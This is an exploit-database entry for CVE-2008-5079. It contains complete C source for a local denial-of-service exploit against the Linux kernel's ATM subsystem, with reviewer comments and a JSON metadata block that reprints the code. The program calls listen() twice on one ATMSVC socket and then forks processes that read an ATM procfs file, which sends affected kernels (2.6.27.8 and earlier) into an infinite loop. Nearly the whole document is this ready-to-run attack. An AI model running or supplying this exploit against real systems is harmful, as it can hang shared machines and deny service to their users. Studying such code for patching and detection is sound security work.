ID 1337DAY-ID-6684
Type zdt
Reporter Jon Oberheide
Modified 2008-12-10T00:00:00
Description
Proof-of-concept local denial-of-service exploit for the Linux kernel ATM subsystem (CVE-2008-5079); category dos / poc
===============================================================
Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit
===============================================================
/*
* cve-2008-5079.c
*
* Linux Kernel <= 2.6.27.8 ATMSVC local DoS
* Jon Oberheide <[email protected]>
*
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:
*
* net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8
* and earlier allows local users to cause a denial of service
* (kernel infinite loop) by making two calls to svc_listen for the
* same socket, and then reading a /proc/net/atm/*vc file, related
* to corruption of the vcc table.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
/*
 * Number of fork() rounds performed in main(). This is a fixed constant;
 * nothing in this file queries the real CPU count of the host.
 */
#define NR_CPUS 8
/* procfs file that main() opens and reads once the socket has been set up. */
#define PROC_ATM "/proc/net/atm/pvc"
/*
 * Reproducer for CVE-2008-5079 (see the header comment for the advisory text).
 *
 * Sequence, exactly as coded below:
 *   1. create a PF_ATMSVC socket and set an SO_ATMQOS option on it;
 *   2. bind() it to an all-zero AF_ATMSVC address;
 *   3. call listen() on that one socket twice;
 *   4. fork a short chain of processes, each of which opens PROC_ATM and
 *      issues a single read().
 *
 * Returns 1 when socket(), setsockopt() or open() fails, and 0 after printing
 * "Local DoS failed" when the read() returns. The statement order is the
 * whole point of the program, so the code is left untouched here.
 *
 * Notes for defenders and reviewers:
 *   - The header comment gives the affected range as 2.6.27.8 and earlier;
 *     the remedy is a kernel that carries the svc_listen fix.
 *   - Step 1 is a hard precondition: if the ATM SVC protocol family is not
 *     available to the caller, socket() fails and the program stops. Hosts
 *     with no ATM hardware can therefore reduce exposure by keeping that
 *     protocol module unavailable (presumably also blocking auto-load;
 *     verify on the distribution in use).
 *   - The symptom named in the advisory is a kernel infinite loop during a
 *     read of an ATM procfs file, so a reader stuck on PROC_ATM is the
 *     behaviour to look for when triaging a suspected hit.
 */
int
main(void)
{
char *err, dummy[1024];
int i, ret, sock, proc;
struct atm_qos qos;
struct sockaddr_atmsvc addr;
printf("[+] creating ATM socket...\n");
sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
if (sock < 0) {
/* Without a PF_ATMSVC socket nothing below can run; report and stop. */
err = "socket(2) for type PF_ATMSVC failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
/* Zero the QoS structure, then fill in only the fields set explicitly below. */
memset(&qos, 0, sizeof(qos));
qos.rxtp.traffic_class = ATM_UBR;
qos.txtp.traffic_class = ATM_UBR;
qos.aal = ATM_NO_AAL;
printf("[+] setting socket QoS options...\n");
ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));
if (ret == -1) {
err = "setsockopt(2) for option SO_ATMQOS failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
/* All-zero address with only the family set. */
memset(&addr, 0, sizeof(addr));
addr.sas_family = AF_ATMSVC;
printf("[+] binding socket...\n");
/* NOTE(review): the return value of bind() is discarded. */
bind(sock, (struct sockaddr *) &addr, sizeof(addr));
printf("[+] socket listen...\n");
/* NOTE(review): the return value of listen() is discarded here as well. */
listen(sock, 10);
printf("[+] duplicate socket listen...\n");
/*
 * Second listen() on the same socket: per the advisory in the header, this
 * repeated svc_listen call is what corrupts the vcc table. Because the
 * result is ignored, a kernel that rejects the call looks the same in this
 * program's output as one that accepts it. Fixed kernels are expected to
 * refuse it -- TODO confirm against the kernel changelog.
 */
listen(sock, 10);
printf("[+] attempting local DoS...\n");
/*
 * fork() chain: a process that gets a non-zero return (the parent, or a
 * caller whose fork() failed with -1) leaves the loop; the new child keeps
 * looping and forks again. Up to NR_CPUS children are created, and every
 * process falls through to the open()/read() below. Nothing waits for the
 * children.
 */
for (i = 0; i < NR_CPUS; ++i) {
if (fork() != 0) {
break;
}
}
proc = open(PROC_ATM, O_RDONLY);
if (proc == -1) {
err = "opening " PROC_ATM " failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
/* Single read of the procfs file; the value stored in ret is never inspected. */
ret = read(proc, &dummy, 1024);
close(proc);
/*
 * Reached only when read() returned. The program treats that as the kernel
 * not having hung, whatever the earlier unchecked calls returned.
 */
printf("[-] Local DoS failed.\n");
return 0;
}
{"published": "2008-12-10T00:00:00", "id": "1337DAY-ID-6684", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category dos / poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-31T01:26:28", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-31T01:26:28", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-31T01:26:28", "edition": 2, "title": "Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit", "href": "https://0day.today/exploit/description/6684", "modified": "2008-12-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/6684", "references": [], "reporter": "Jon Oberheide", "sourceData": "===============================================================\r\nLinux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n\r\n/*\r\n * cve-2008-5079.c\r\n *\r\n * Linux Kernel <= 2.6.27.8 ATMSVC local DoS\r\n * Jon Oberheide <[email\u00a0protected]>\r\n *\r\n * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:\r\n *\r\n * net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8\r\n * and earlier allows local users to cause a denial of service \r\n * (kernel infinite loop) by making two calls to svc_listen for the\r\n * same socket, and then reading a /proc/net/atm/*vc file, related \r\n * to corruption of the vcc table. 
\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <linux/atm.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n \r\n#define NR_CPUS 8\r\n#define PROC_ATM \"/proc/net/atm/pvc\"\r\n \r\nint\r\nmain(void)\r\n{\r\n char *err, dummy[1024];\r\n int i, ret, sock, proc;\r\n struct atm_qos qos;\r\n struct sockaddr_atmsvc addr;\r\n \r\n printf(\"[+] creating ATM socket...\\n\");\r\n \r\n sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);\r\n if (sock < 0) {\r\n err = \"socket(2) for type PF_ATMSVC failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n \r\n memset(&qos, 0, sizeof(qos));\r\n qos.rxtp.traffic_class = ATM_UBR;\r\n qos.txtp.traffic_class = ATM_UBR;\r\n qos.aal = ATM_NO_AAL;\r\n \r\n printf(\"[+] setting socket QoS options...\\n\");\r\n \r\n ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));\r\n if (ret == -1) {\r\n err = \"setsockopt(2) for option SO_ATMQOS failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n addr.sas_family = AF_ATMSVC;\r\n \r\n printf(\"[+] binding socket...\\n\");\r\n \r\n bind(sock, (struct sockaddr *) &addr, sizeof(addr));\r\n \r\n printf(\"[+] socket listen...\\n\");\r\n \r\n listen(sock, 10);\r\n \r\n printf(\"[+] duplicate socket listen...\\n\");\r\n \r\n listen(sock, 10);\r\n \r\n printf(\"[+] attempting local DoS...\\n\");\r\n \r\n for (i = 0; i < NR_CPUS; ++i) {\r\n if (fork() != 0) {\r\n break;\r\n }\r\n }\r\n \r\n proc = open(PROC_ATM, O_RDONLY);\r\n if (proc == -1) {\r\n err = \"opening \" PROC_ATM \" failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n ret = read(proc, &dummy, 1024);\r\n close(proc);\r\n \r\n printf(\"[-] Local DoS failed.\\n\");\r\n \r\n return 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-31] #", "immutableFields": 
[]}
{}